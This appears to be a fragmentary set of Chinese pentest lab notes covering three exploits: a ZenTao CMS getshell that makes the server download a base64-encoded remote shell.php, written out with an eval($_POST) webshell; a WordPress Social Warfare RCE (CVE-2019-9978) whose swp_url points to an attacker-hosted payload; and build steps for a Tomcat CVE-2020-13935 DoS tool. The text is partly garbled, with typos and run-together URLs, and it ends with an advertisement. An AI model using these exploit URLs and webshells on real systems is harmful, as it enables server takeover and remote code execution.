2、将shell.php 放到web 服务器可以访问的目录3、对恶意文件地址进行base64编码利用poc远程下载文件
http://靶场 ip/zentao/client-download-1
aHR0cDovL3h4eC54eHgueHh4Lnh4eC9zaGVsbC5waHA-1.html
访问shell
http://靶场 ip/zentao/data/client/1/shell.php ok拿下。 禅道12.4.2后台管理员权限Getshell - FreeBuf网络安全行业门户
青岛易软天创网络科技有限公司禅道cms存在命令执行漏洞CNVD-2020-45147
12.3.2
【CNVD/CVE】CNVD-C-2020-121325-CSDN博客
aHR0cDovLzM5LjEwNS4xNTQuMTMzOjkwOTAvc2hlbGwucGhwzentao/client-download-1-aHR0cDovLzM5LjEwNS4xNTQuMTMzOjkwOTAvc2hlbGwucGhw-1.htmlzentao/data/client/1/shell.php?php echo ?php phpinfo();?;
?php echo ?php eval($_POST[2]);?;SFRUUDovLzM5LjEwNS4xNTQuMTMzOjkwOTAvc2hlbGwucGhw
http://101.36.125.125:20092/zenteo/www/client-download-1-SFRUUDovLzM5LjEwNS4xNTQuMTMzOjkwOTAvc2hlbGwucGhw.html cve-2019-9978
CVE-2919-9978 wordpress social warfare插件RCE | St1_Fn
登录---开启插件---构造利用 http://39.105.154.133:9090/test.txthttp://your-targetIP/wp-admin/admin.php?pagesocial-warfareswp_debugload_optionsswp_urlhttp://you-attack-ip/test.txt
http://101.36.125.125:37769/wp-admin/admin.php?pagesocial-warfareswp_debugload_optionsswp_urlhttp://39.105.154.133:9090/test.txt猫咪cve-2020-13935 题重 测试POC
https://github.com/RedTeamPentesting/CVE-2020-139351. $ git clone https://github.com/RedTeamPentesting/CVE-2020-13935
2. $ cd CVE-2020-13935
3.go env -w GOPROXYhttps://goproxy.cn
4. $ go build
5. $ ./tcdos ws://靶场ip/examples/websocket/echoStreamAnnotation 广x
打个广xxx gpt教程https://gitee.com/jinhu1/chatgpt-share 加vkiko_wp 发你永久免费的GPT授权码。
